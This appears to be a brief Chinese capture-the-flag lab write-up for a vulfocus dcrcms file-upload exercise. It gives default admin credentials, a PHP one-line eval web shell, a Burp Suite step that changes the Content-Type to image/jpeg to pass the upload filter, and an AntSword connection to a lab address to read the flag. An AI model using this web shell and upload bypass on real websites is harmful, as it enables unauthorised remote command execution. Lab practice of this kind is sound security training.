vulfocus 文件上传来练习
启动dcrcms
访问80端口的登录界面
账号:admin 密码:123456
找到导入模版里文件上传,上传一句话木马
<?php @eval($_REQUEST[777]) ?>
bp拦截之后,开始导入
将类型改为:image/jpeg之后,上传
在文件管理器的如下地址中找到上传的一句话木马
中国蚁剑连接
地址为:http://10.9.47.6:62831/uploads/cache/2023_10_27/2310270310168430.php
密码为:777
进入虚拟终端,在/tmp下找到flag